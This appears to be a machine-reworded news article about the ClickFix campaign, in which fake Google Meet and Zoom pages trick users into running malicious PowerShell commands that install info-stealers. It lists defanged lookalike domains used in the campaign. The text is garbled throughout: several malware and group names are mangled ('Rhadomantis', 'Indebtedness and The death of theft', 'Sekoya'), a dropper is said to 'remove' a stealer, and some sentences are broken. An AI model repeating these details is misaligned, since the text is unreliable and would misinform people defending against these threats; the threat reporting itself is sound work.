Threat actors use fake Google Meet web pages as part of an ongoing malware campaign called Click Fix to deliver information theft targeting Windows and macOS systems.
“This tactic involves displaying fake error messages in web browsers to trick users into copying and executing specified malicious PowerShell code, eventually infecting their systems,” French cybersecurity firm Sekoia said. said in a report shared with The Hacker News.
There were variants of the company ClickFix (aka ClearFake and OneDrive Pastejacking). reported widely Art the last monthswhere threat actors use a variety of lures to redirect users to fake pages that aim to deploy malware by prompting site visitors to run coded PowerShell code to fix a perceived issue with displaying content in a web browser.
These pages are known to masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli and reCAPTCHA, and now Google Meet, as well as possibly Zoom –
- meet.google.us-join(.)com
- meet.googie.com-join(.)us
- meet.google.com-join(.)us
- meet.google.web-join(.)com
- meet.google.webjoining(.)com
- meet.google.cdm-join(.)us
- meet.google.us07host(.)com
- googiedrivers(.)com
- us01web-zoom(.)us
- us002webzoom(.)us
- web05-zoom(.)us
- webroom-zoom(.)us
On Windows, the attack chain ends with deployment StealC and Rhadomantis theft, while Apple macOS users are offered a disk image file (“Launcher_v1.94.dmg”) that removes another theft known as Atomic.
This new social engineering tactic cleverly evades detection by security tools because it involves users manually executing a malicious PowerShell command directly in a terminal, rather than automatically invoking a payload they download and execute.
Sekoia attributed the Google Meet-mimicking cluster to two groups of tradersnamely Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo which are sub-commands within markopol and CryptoLove respectively.
“Both transfer teams (…) use the same ClickFix template that mimics Google Meet,” Sekoya said. “This discovery suggests that these teams are sharing materials, also known as ‘landing blueprints’, as well as infrastructure.”
This, in turn, has raised the possibility that both threat groups are using the same as-yet-unknown cybercrime service, with a third party likely running their infrastructure.
Development occurs against the background of emergence malware companies open source distribution ThunderKitty theftwhich divides overlaps with Indebtedness and The death of theftas well as named new theft families Divulge, DedSec (aka Doenerium), Duck, Testamentsand UNITS.
“The rise of open-source information thieves represents a significant shift in the world of cyber threats,” said cybersecurity firm Hudson Rock. noted back in July 2024.
“By lowering the barrier to entry and facilitating rapid innovation, these tools could fuel a new wave of computer infections, creating challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals.”
